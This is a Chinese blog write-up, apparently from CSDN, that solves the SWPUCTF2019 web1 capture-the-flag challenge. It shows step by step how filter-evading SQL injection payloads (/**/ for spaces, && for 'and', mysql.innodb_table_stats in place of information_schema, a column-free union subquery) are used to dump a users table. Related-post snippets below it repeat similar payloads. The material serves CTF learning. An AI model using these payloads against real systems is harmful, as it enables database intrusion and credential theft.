SWPUCTF2019 web1

最新推荐文章于 2024-05-06 12:56:50 发布
最新推荐文章于 2024-05-06 12:56:50 发布
阅读量360 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zydbk123456/article/details/105774122
版权

1.登录页面

进来首先是个登录页面,一开始尝试用admin登录并用暴力破解得出密码,但是好像破解不出密码。
在这里插入图片描述

看到下面有个注册页面,点开注册一个账号就可以登录了。登录后,点开广告申请,发现有点不对劲。一开始看到文本框,想到了xss,试过几个xss payload,发现应该和xss无关。。。想到sql注入,但不知道怎么构造绕过的payload。看了网上大佬的WP,学到了sql注入的新姿势,原来这是利用了无列名注入。

在这里插入图片描述

2.构造payload

随便试了几个payload,发现order,and,or都被过滤了。空格也被过滤了。。。但是空格可以用/**/代替。and也可以用&&代替。那么先试试有几个字段。由于order被过滤了,没法用order by子句判断目标表的列数了。这里我就逐渐增加字段数,这样慢慢的发现竟然有22个字段,并且第2,3列是显示列

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='1

在这里插入图片描述

接下来就是老套路,查表,查列,查数据了。

首先爆数据库名,数据库名为web1

-1'/**/union/**/select/**/1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='1

在这里插入图片描述

接下来爆表名

-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='web1'/**/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='1

但是information被过滤了,实际上是or被过滤了,导致order,or,information这些字都被过滤了。那怎么查到表名?在网上搜索才知道mysql在5.7版本之后还有一个sys系统表sys.schema_auto_increment_columns,作用和information_schema是相似的。

-1'/**/union/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/sys.schema_auto_increment_columns /**/where/**/table_schema=database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='

但是试了一下报错,页面说sys.schema_auto_increment_columns这个表不存在。但是根据刚才试列数是页面报的错才知道mysql.innodb_table_stats这个表也可以用,也类似于information_schema,这是这个表的详细使用信息:

https://mariadb.com/kb/en/mysqlinnodb_table_stats/

那么重新构造payload:

-1'/**/union/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='

查到有两个表ads,users。ads应该是和广告有关的,这里先试试users表

在这里插入图片描述

-1'/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/&&/**/'1'='1

在这里插入图片描述

这里用到了子查询,子查询是将一个查询语句放在另一个查询语句中,在特定的情况下,一个查询语句的条件需要另一个查询语句来获取,内层查询语句的查询结果,为外层查询语句提供查询条件。

得到flag,提交

zydbk123456
关注
[SWPUCTF 2021 新生赛]sql - 联合注入
oZuoShen123的博客
10-07 673
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
BUUCTF:[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改
Zero_Adam的博客
02-24 4036
目录:一、自己做:二、不足&&学到的:三、学习WP1.测试看看过滤了那些关键字,(这里要多看看,学学)2.使用无列名注入:这里稍停一下:3.下面学习无列名注入: 无列名注入详解:无列名注入详解 参考自:本题目的详解 写博客只是为了输出学习而已, 无他 一、自己做: 发现了 那个广告的地方可能有漏洞 二、不足&&学到的: 尝试了ssti。却忘记了尝试sql注入。。。 过滤了order的时候,可以用group by 来测试有多少行 单引号闭合,正常闭合会出错的话,可以,
swpuctf---web1(双查询注入,别名代替,mysql5.7以上的sys系统表)
weixin_44897902的博客
12-13 325
怎么也没想到,这sql注入有22个字段,当时到了15个字段,还不对,还以为是出题人在告诉我不能使用联合注入,若不是22个字段,我猜我还是能做出来的吧…啊哈哈,也不一定,手动滑稽 反正也做记录吧 首先就是一个登录框,注册的时候发现存在admin,几次弱密码没试出来,应该不是爆破,然后随便注册一个,登录进去之后发现有发广告的选项,第一反应是xss,x了一会儿,后来出题人说不是xss,才发现是sql注入...
BUUCTF:[SWPU2019]Web1
qq_46230755的博客
12-27 510
一个登录页面,先去试着注册一个账号 老样子试图注册admin,发现用户已存在 那先随便注册个123 123进去 然后申请一下发布广告 发现实现了一个留言板的功能,考虑一下有没有存在注入的可能。 申请一个1’发现存在着回显 fuzz一下,可以发现过滤挺多东西的。比如空格我们可以用/**/替代导致无法使用information_schema库,我们可以通过无列名注入 构造payload -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14.
buuctf [SWPU2019]Web1 1
weixin_45642610的博客
03-13 1661
buuctf [SWPU2019]Web1 1 sql 无列名注入 注册登录发布广告 1'测试 存在sql注入 经测试,or,空格,#被过滤 不能用order by测试列数,用group by代替 注释符#用,'3代替,数字随便 (这里的'相当于闭合了输入语句里参数的右引号,变成'3'字符串,此时整个语句没有注释符)(如果参数不在sql语句末尾,那不是失败了?有无懂哥?) 空格用/**/代替 1'/**/group/**/by/**/22,'3 1'/**/group/**/by/**/23,'
web buuctf [SWPU2019]Web1
weixin_44214568的博客
04-06 434
考点:无列名注入 1. 登录界面和注册界面,发现admin账号被注册了,fuzz也没爆出密码来;尝试注入,dirsearch也没东西,源码上也没啥东西 最后注册了一个账号,登录进去 随便填了填,申请过去 这是广告详情 看url上有个id,尝试着注入,也没发现啥问题,没有地方报错 2.在广告申请栏的标题注入1',在查看广告详情 fuzz,发现or和空格都被过滤了,#和--+也过滤了 没法用order by 空格我们可以用/**/绕过 3.在标题处注入1'/*...
[SWPU2019]Web6
lllffg的博客
03-16 738
[SWPU2019]Web6 SQL注入中的with rollup 利用session.upload_progress进行文件包含和反序列化渗透 一个登陆页面,尝试一下1’ and sleep(4)#后弹出被过滤的回显,然后怎么都没思路,然后输入了下万能密码1’ or 1=1 or ‘1’='1,回显了passwd错误,这证明只对passwd进行的检测 看了下wp 猜测源码太狠了 $sql="select * from users where username='$name' and passwd='$
[BUUCTF][SWPU2019]Web1
朋克归零膏的博客
10-28 600
无列名注入fuzz过滤词绕过空格。
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
[SWPUCTF 2021 新生赛]web 解题思路,实操解析,解题软件,解题方法
最新发布
09-06
关于sql注入
【NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列(WEB篇)
jameshuangchuan的博客
08-08 2899
此处主要在NSSCTF平台()上开展刷题。
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
SWPUCTF_2019_p1KkHeap
z1r0的博客
03-12 237
SWPUCTF_2019_p1KkHeap 查看保护 开了沙盒,用orw来读即可。 这里mmap了0x66660000这一段内存rwx权限。所以我们可以将shellcode放入这里。 一个uaf漏洞 攻击思路:因为有一个uaf,便是delete只能用三次。所以可以考虑攻击tcache这个结构体。然后劫持这个结构体实现任意地址分配 1.首先需要泄露一个heap_addr用这个heap_addr来计算出tcache的地址。创建的堆块超过fatstbin的大小即可。 这里笔者选的是0x100 2.泄露出了
SWPU CTF题解
weixin_34255793的博客
12-22 451
本博客为西南石油大学(南充校区)CTF团队赛的题解 所有题目网址:http://47.106.87.69:9000/game 今天我是流泪狗狗头 解压后发现压缩包中是一个带有密码的图片,winhex分析二进制,发现文件数据区的全局加密为00 00,但压缩源文件目录区的全局方位标记为09 00,可知为伪加密,更改为00 00即可在解压出图片,再用notep...
SWPUCTF2019web题复现
bmth666的博客
04-05 1298
[SWPU2019]easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标题处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 后面发现还可以用-1'/**/group/**/by/**/22,'1,一样可以爆出为22列 查看数据库:-1'
[SWPUCTF 2021 新生赛]第一波放题(nssctf刷题)
weixin_63231007的博客
04-09 9042
[SWPUCTF 2021 新生赛]jicao json_decode介绍: json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_decode — 对 JSON 格式的字符串进行编码 说明 mixed json_decode ( string $json [, bool $assoc ] ) 接受一个 JSON 格式的字符串并且把它转换为 PHP 变量 参数 json 待解码的 json string 格式的字符串。 asso
CTF 全讲解:[SWPUCTF 2024 新生赛]Do_you_know_http,深入浅出网络安全开发
2401_83974064的博客
04-17 804
因此,在安全性要求较高的情况下,应该使用其他方式来验证客户端的身份。Web开发人员和服务器管理员通常使用 User-Agent 请求头来识别客户端的类型和版本,以确保网站或应用程序能够提供适当的内容或功能。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以帮助用户识别潜在的安全漏洞,进行渗透测试,以及执行各种与网络安全相关的任务。当 HTTP 请求经过。是为了让服务器能够根据客户端的不同特性来适配响应内容,以提供更好的用户体验。我们的 IP 地址,这可以通过修改 HTTP 请求头实现。
2024年最新synchronized与单例的线程安全问题,2024年最新字节跳动网络安全三面凉凉
2301_82242964的博客
05-06 269
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
[SWPUCTF 2023 秋季新生赛]web(详解)
m0_63641882的博客
11-04 258
新知识点// 1.tee命令的使用 2. 数组绕过的原理 3. data协议的使用4. php的非法传参。
[SWPUCTF 2018]SimplePHP
07-28
回答: \[1\]中的代码片段是一个PHP代码示例,其中定义了三个类C1e4r、Show和Test,并创建了相应的对象。\[2\]中的代码片段是一个PHP文件,它包含了一些文件操作和类的实例化。\[3\]中的代码片段是一个POC(Proof of Concept)示例,用于演示一个可能的漏洞利用场景。根据提供的信息,这个问题可能是关于SWPUCTF 2018比赛中的一个题目,题目名称为"SimplePHP"。然而,由于提供的引用内容不完整,无法给出更具体的答案。如果您有关于这个问题的更多信息,请提供更多的上下文,以便我能够更好地回答您的问题。 #### 引用[.reference_title] - *1* [[SWPUCTF 2018]SimplePHP_wp](https://blog.csdn.net/lzu_lfl/article/details/127802053)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[SWPUCTF 2018]SimplePHP](https://blog.csdn.net/shinygod/article/details/124002143)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[SWPUCTF 2018]SimplePHP--一道简单的Phar反序列化题目](https://blog.csdn.net/qq_41401434/article/details/125323752)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值